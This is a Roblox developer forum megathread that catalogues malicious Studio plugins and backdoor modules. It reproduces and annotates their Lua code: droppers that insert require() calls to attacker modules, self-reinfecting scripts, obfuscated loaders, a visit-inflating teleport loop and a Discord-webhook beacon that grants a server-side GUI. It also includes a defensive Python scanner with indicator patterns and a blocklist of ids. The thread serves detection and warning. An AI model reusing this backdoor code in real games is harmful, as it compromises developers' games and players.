Known Malicious Plugins for HISR detection Megathread

Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332

Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463

Roundify
Malicious plugin: 4593270188
Original plugin: 2233768483


This is awesome. Much faster than self-verification and an easy way of getting what you need.

Thanks for creating the tool!


Virus-Destroyer (Anti-Serverside)

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:

pcall(function()
	-- decoy names for the dropped Script
	local a = {'Weld', "FilterEvent", "ClickerModule", "ChatModule", "Anti-Exploit"}
	local b = Instance.new("Script")
	-- the --[[ ... ]] block comment ends at ]], so require(...):Fire() still runs on the server
	b.Source = '--[[ROBLOX Studio Script]] require(4850721608):Fire() '
	b.Name = a[math.random(1, #a)]
	-- three copies: ServerScriptService, inside an existing Script, inside a Model in workspace
	for a = 1, 3 do
		local b = b:Clone()
		if a == 1 then
			b.Parent = game:GetService("ServerScriptService")
		elseif a == 2 then
			b.Parent = workspace:FindFirstChildOfClass("Script")
		elseif a == 3 then
			b.Parent = workspace:FindFirstChildOfClass("Model")
		end
	end
end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Custom Name Title

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:

pcall(function()local a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end) -- same dropper as the Virus-Destroyer entry above; the leading "pcall(function()local" was cut off in the paste

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Fall Damage Plugin [FIXED]

Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED

~~
~~

1

Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new("Script")
AntiExploit.Parent = game.Workspace.Camera -- parented under Camera, which is rarely expanded in the Explorer
AntiExploit.Name = "ClientReplicator"
AntiExploit.Source = [[
--Official roblox studio script
require(4582121027):protecc()
]]

Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic

~~
~~

2

Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new("Script")
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = "ClientReplicator"
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
	wait(0.0000001)
	local joinData = player:GetJoinData().SourcePlaceId
	local TeleportService = game:GetService("TeleportService")
	-- players arriving back from the "Loading" place get a module loaded if they hold rank 2 in the attacker's group
	if joinData == 4628266409 then
		local Tpdata = player:GetJoinData().TeleportData
		if Tpdata then
			Req = Tpdata.req
			gid = Tpdata.grid
		end
		if player:GetRankInGroup(gid) == 2 then
			require(Req).load(player.Name)
		end
		return
	else
	end
	-- everyone else is teleported to the "Loading" place, which sends them straight back
	local Players = game:GetService("Players")
	local TeleportService = game:GetService("TeleportService")
	local teleportData = {
		maxxPlrs = Players.MaxPlayers,
		maxPlrs = Players.NumPlayers,
		placeId = game.PlaceId,
		JobId = game.JobId,
		CreatorId = game.CreatorId
	}
	TeleportService:Teleport(4628266409, player, teleportData)
end)
]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.

~~
~~

3

Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:

function a(b) -- the leading "function" was cut off in the paste; the a(workspace) / a(ServerScriptService) calls at the end need it
	function c(d)
		-- append the "backpack code" loader source to the end of the Script
		d.Source = d.Source .. '\n' .. game:GetObjects('rbxassetid://4850318089')[1].Source
	end
	for e, d in next, b:GetDescendants() do
		if rawequal(d.ClassName, 'Script') and not string.find(d.Source, '4794986906') then
			c(d)
			-- re-infect the Script if someone edits the loader back out
			d:GetPropertyChangedSignal('Source'):Connect(function()
				if not string.find(d.Source, '4794986906') then c(d) end
			end)
		end
	end
	f = false
	function g()
		-- drop a "Filter Event" script and resurrect it when it is deleted, disabled or edited
		d = game:GetObjects('rbxassetid://4852273118')[1]
		if not b:FindFirstChild('Filter Event') or b:FindFirstChild('Filter Event').Source ~= d.Source then
			d.Parent = b
		else
			d = b:FindFirstChild('Filter Event')
		end
		function h()
			if not f then
				wait(1/60)
				f = true
				d:Destroy()
				f = false
				g()
			end
		end
		i = d:GetPropertyChangedSignal('Parent'):Connect(h)
		d.Changed:Connect(function(j)
			if rawequal(j, 'Disabled') or rawequal(j, 'Source') then
				i:Disconnect()
				h()
			end
		end)
	end
	g()
end
a(workspace)
a(game:GetService('ServerScriptService'))

There are multiple require ids in this action. All of them are listed below.

Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:

--[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn't modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
-- You may proceed if you have basic knowledge of scripting and know what you're doing.
local RunService = game:GetService("RunService")
local Require = require
local Loader = 4794986906 -- Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then -- Checks if it isn't Studio, as it defeats the purpose of the module, also checks if it is being ran on the server's side and not on the client's side, just to be on the safe side.
	pcall(Require, Loader) -- Begins to load the module, it is wrapped in pcall so it doesn't bother you in anyway whatsoever.
end

Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown, as it is obfuscated.

Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:

if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end -- "\114\101\113\117\105\114\101" decodes to "require"; the index brackets and argument were cut off in the paste and are restored from the require id given below

Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to the above malicious require id.

~~
~~

5

Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:

pcall(function()local a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end) -- same dropper as the Virus-Destroyer and Custom Name Title entries above

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is a part of the above malicious plugins.


Backdoor malicious module

getfenv()['\114\101\113\117\105\114\101'](2422875198*2) -- '\114\101\113\117\105\114\101' decodes to "require"

2422875198*2 = 4845750396

It is obfuscated, but running it in repl.it prints the module id that failed to load,
which it then loads,

which has a script to then load

Roblox = "IsStudio" -- in the original this line is followed by a very long run of tab characters, pushing the rest off-screen in the Studio editor
local a = game:GetService("RunService")
if a:IsStudio() then
	print('Loaded!')
else
	-- skips three specific places, otherwise require(4995978719):
	-- string.reverse("\101\114\105\117\113\101\114") == "require"
	-- "\116\111\110\117\109\98\101\114" == "tonumber", "\99\104\97\114" == "char", "\117\110\112\97\99\107" == "unpack"
	-- string.char(52,57,57,53,57,55,56,55,49,57) == "4995978719"
	if game.PlaceId == 185655149 or game.PlaceId == 920587237 or game.PlaceId == 735030788 then
	else
		getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))
	end
end

and

--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {}
-- in the original, each of the three lines marked below is preceded by a very long run of tab characters
local CheckMeIn = false -- (padded)
if CheckMeIn == true then
	require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
	CheckMeIn = "Loaded."
	local a = script.Script -- (padded)
	a.Parent = workspace.Camera -- (padded)
end

return module

Module 862849844 is referred to as CheckMeIn; it is unknown whether this is the original creator's, or just something the backdoor creator is using to log users who have this backdoor in their game. I've tried to inform them about the use of this module; they had been warned for over 3 days before I posted this.

The top script then finally loads this module.

This module has a lot of obfuscated code, but one of the scripts remained unobfuscated, loading these two other modules.

MainModule> Folder> Main> ul

-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
	if Player:GetRankInGroup(6157358) >= 2 then
		wait(0.1)
		require(4674979018):Fire(Player.Name)
		require(5033070911):ikthisisskidded(Player.Name)
		game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
	end
end)
game.Players.PlayerAdded:Connect(function(Player)
	if Player:GetRankInGroup(5860863) >= 2 then
		wait(0.1)
		require(4834950415):Fire(Player.Name)
		require(5033070911):ikthisisskidded(Player.Name)
	end
end)
game:GetService("Players").PlayerAdded:Connect(function(player)
	if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
		game:GetService("TeleportService"):Teleport(5009641755, player)
	end
end)

Many of the modules use these groups to check whether a player is a member before giving that member the scripts in this backdoor.

Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’

One of the scripts checks a banlist at
https://builderman.club/fe.json
It would be suggested to blacklist this domain.

Loads another module

and another module

This module then uses LuaVM to load code without needing loadstring, in
MainModule > JohnDoe > Main > Shadow > Frame > RemoteHandle

another module

This backdoor is still loaded by an unknown plugin, still looking for it.


Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not LocalScript), when I click behind the last "end" (how do I explain this), it moves you to the very side of the script, as if you've written 500 spaces on one line and clicked behind a letter: it moves your scrollbar (for the X position) to the very far right.

Now, if this happens, move the scrollbar slowly until you find some weird code. For example, I had this:

if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end -- "\114\101\113\117\105\114\101" decodes to "require"

This has to be a "virus"; delete those.

Another way to detect those is by searching for "game:service", in case you haven't used "game:service" in your script.

I do not know what malicious plugin my friend has installed


Already covered this one and Roblox has finally deleted this module.


https://www.roblox.com/library/4723753937/Content-Deleted

https://www.roblox.com/library/4929048497/Test

Two modules required by malicious code. I don't know which plugin though, sorry. Hope this helps.

The second module teleports here:
https://www.roblox.com/games/4915459682/Loading?refPageId=ad45ba48-2b45-4b42-ad1e-93d4fdc2113f


That module requires this

Looks like I completely missed you notifying me about this… but the script is definitely not mine. The only way to install CheckMeIn is through these models: Standard Kit, Enterprise Kit. I am aware of many other models on the platform that claim to be the official kit, but they are instead a combination of the official kit, with a back door added. That’s what you’ve found here. All I can do about this is tell my users not to install any third party modules, since technically a back door is not against the Roblox rules.

Edit: The require id it has does load a model that is on your account, if that is what you meant. This script, however, considered it to just be loading your module.

That’s what I exactly replied to people in your discord server but your discord server ended up being toxic against my attempt to inform your group directly and I left. I just wanted to let you guys know and attempt to invalidate whatever key the backdoor was using. It doesn’t matter if a backdoor isn’t against the tos, it’s malicious and Roblox can moderate any accounts for any reason.

Edit: I’m not saying that your module is one, I’m saying that it’s being used inside one. Any further chats about this, please message.


Maybe move this to a GitHub repo; it makes it much easier to log and request the data, as you can just send an HTTP GET request to the repository to download a JSON file. Plus, it allows other developers to use the same list if they make their own anti-virus.

I have no idea how your system works, so I cannot provide an example, but you can just do
HTTPService:GetAsync(a link to your repository) and then decode it with JSONDecode.

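The two ideas in the posts above, scrolling past long whitespace runs and searching scripts for "game:service", and keeping the known-bad ids in a shared JSON list, can be combined into an offline scanner. The following is an added example, not code from this thread, from Roblox, or from the tool the thread is about. It is written in Python rather than Luau so it can run over exported script sources outside Studio. The blocklist contents, the 64-character padding threshold, the regular expressions and the sample scripts are assumptions constructed from the snippets quoted in this thread.

```python
"""Offline scanner for the backdoor patterns collected in this thread (added example).

Feed it the Source text of each Script/ModuleScript. It undoes the cheap obfuscation
seen above (decimal escapes, string.reverse, getfenv()[...] indexing,
string.char(unpack{...}), id arithmetic) and reports what ends up in require().
"""
import re

# Blocklist built from the require/module ids posted in this thread. Assumption: a
# JSON list like the one suggested above would carry these; extend as the thread grows.
KNOWN_BAD_IDS = {
    4850721608, 4582121027, 4852273118, 4794986906, 4850318089,
    4845750396, 4995978719, 5090011414, 5077231493, 4751241292,
}

_DEC_ESCAPE = re.compile(r"\\(\d{1,3})")                                    # "\114" -> "r"
_REVERSE = re.compile(r"string\.reverse\(\s*([\"'])(.*?)\1\s*\)")            # string.reverse("eriuqer")
_GETFENV_IDX = re.compile(r"getfenv\(\)\s*\[\s*([\"'])(\w+)\1\s*\]")         # getfenv()["require"]
_STRING_IDX = re.compile(r"\bstring\s*\[\s*([\"'])(\w+)\1\s*\]")             # string["char"]
_CHAR_UNPACK = re.compile(r"string\.char\(\s*unpack\s*\{([\d,\s]+)\}\s*\)")  # string.char(unpack{52,...})
_TONUMBER = re.compile(r"tonumber\(\s*\"(\d+)\"\s*\)")                       # tonumber("4995978719")
_REQUIRE = re.compile(r"\brequire\s*\(\s*(\d[\d\s*+]*)\)")                   # require(2422875198*2)
_ASSET_ID = re.compile(r"(?<![\w.])\d{6,}(?![\w.])")                         # bare id literals (local Loader = ...)
_PADDING = re.compile(r"[ \t]{64,}")                                         # code pushed off-screen (assumed threshold)
_IOC_PATTERNS = {
    "getfenv": re.compile(r"\bgetfenv\s*\("),
    "decimal escape": re.compile(r"\\\d{2,3}"),
    "game:service alias": re.compile(r"game:service\b"),
    "loadstring": re.compile(r"\bloadstring\s*\("),
    "discord post": re.compile(r"PostAsync\s*\(\s*['\"]https://discord", re.I),
}


def normalize(src):
    """Rewrite the obfuscation tricks seen in this thread into plain Lua text."""
    t = _DEC_ESCAPE.sub(lambda m: chr(int(m.group(1))), src)
    t = _REVERSE.sub(lambda m: '"%s"' % m.group(2)[::-1], t)
    t = _GETFENV_IDX.sub(r"\2", t)
    t = _STRING_IDX.sub(r"string.\2", t)
    t = _CHAR_UNPACK.sub(lambda m: '"%s"' % "".join(chr(int(n)) for n in m.group(1).split(",")), t)
    t = _TONUMBER.sub(r"\1", t)
    return t


def _eval_id_expr(expr):
    """Evaluate the '+'/'*' arithmetic a dropper uses to hide an id; None if not plain integers."""
    try:
        total = 0
        for term in expr.split("+"):
            product = 1
            for factor in term.split("*"):
                product *= int(factor)
            total += product
        return total
    except ValueError:
        return None


def require_ids(src):
    """Asset ids that end up inside require() once the obfuscation is undone."""
    ids = set()
    for m in _REQUIRE.finditer(normalize(src)):
        value = _eval_id_expr(m.group(1))
        if value is not None:
            ids.add(value)
    return ids


def scan(src):
    """Return require ids, blocklist hits, per-line IOCs and an overall verdict for one script."""
    ids = require_ids(src)
    literal_hits = {int(m.group()) for m in _ASSET_ID.finditer(src)}
    known_bad = (ids | literal_hits) & KNOWN_BAD_IDS
    iocs = []
    for line_no, line in enumerate(src.splitlines(), 1):
        for label, pat in _IOC_PATTERNS.items():
            if pat.search(line):
                iocs.append((line_no, label))
        if _PADDING.search(line):
            iocs.append((line_no, "whitespace padding"))
    if known_bad:
        verdict = "malicious"
    elif ids or iocs:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"require_ids": ids, "known_bad": known_bad, "iocs": iocs, "verdict": verdict}


# Constructed samples modelled on the snippets quoted in this thread (not captured files).
SAMPLES = {
    "hidden require": "local Damage = 10" + "\t" * 80
        + r'''if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end''',
    "reversed + unpack": r'''local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end''',
    "id arithmetic": r"""getfenv()['\114\101\113\117\105\114\101'](2422875198*2)""",
    "benign": 'local Players = game:GetService("Players")\nlocal Config = require(script.Parent.Config)\n',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        result = scan(src)
        print(f"{name}: {result['verdict']} require={sorted(result['require_ids'])} "
              f"known_bad={sorted(result['known_bad'])} iocs={result['iocs']}")
```

The normalisation order matters: string.reverse has to be folded before the getfenv()[...] index is collapsed, and the unpack digits have to become a string before tonumber() is folded, otherwise the final require(...) never appears for the regex to find. Bare id literals are checked separately because the Filter-Event module above never calls require(4794986906) directly; it aliases require and passes the id through a local.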

Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end) -- '\114\101\113\117\105\114\101' decodes to "require"

Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicious action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end) -- '\114\101\113\117\105\114\101' decodes to "require"

Both malicious actions lead to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it's an obfuscated script; however, by constant dumping and inspecting its constants, it's clear that it's a backdoor. Its constant dump can be found here - https://pastebin.com/raw/FhZyxTty.


F3X Plugin

Malicious:

Original:

Fake Anti-Virus/Backdoor Scanner

Malicious:


Thank you for your post, I see it helpful. Also it’s a surprise to find an HR of BH here. <3



Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin

Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)


Malicious Script, plugin unknown

require(4751241292)()

Malicious Action

local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
-- the beacon needs HttpService enabled; a GET to google.com is used to find out
function CheckHttp()
	local f = pcall(function() HTTP:GetAsync'https://www.google.com' end)
	if f == true then
		return true
	else
		return false
	end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
	local A = CheckHttp()
	if A == true then
		-- every join is reported to a Discord webhook (URL redacted in the post)
		local Data = {
			content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
			username = "wet man"
		}
		HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
	end
	-- the operator, or anyone on their friends list, gets the server-side GUI
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end)
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end
local A = CheckHttp()
if A == true then
	local Data = {
		content = "omg a game!  https://www.roblox.com/games/"..game.PlaceId;
		username = "wet man"
	}
	HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
return function()end

Essentially gives a serverside loadstring gui if a player is or is friends with…

https://www.roblox.com/users/1460281907/profile

Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.


Fake "content deleted" backdoor.
Super long chain of 'require' calls to try to hide the main code, still going.

After chaining for 30+ times (and randomly, manually 'report abuse'-ing some of them), I reached the obfuscated code.

I'm not bothering to go into full detail on why I believe this is malicious, due to having an alternative issue that I consider to be 'roblox severe'.

This plugin is possibly malicious:

I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.
